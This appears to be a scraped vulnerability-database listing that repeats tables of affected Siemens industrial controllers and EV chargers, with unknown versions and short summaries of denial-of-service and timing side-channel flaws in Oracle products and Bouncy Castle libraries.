vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
Multiple vulnerabilities across Oracle Utilities, WebLogic Server, and Bouncy Castle libraries allow for denial of service attacks and sensitive data leakage through timing side-channel exploits.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
Multiple vulnerabilities across Oracle Utilities Application Framework, WebLogic Server, and Business Intelligence Enterprise Edition, as well as Bouncy Castle libraries, allow unauthenticated attackers to induce denial of service, with CVSS scores of 7.5 for Oracle products.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
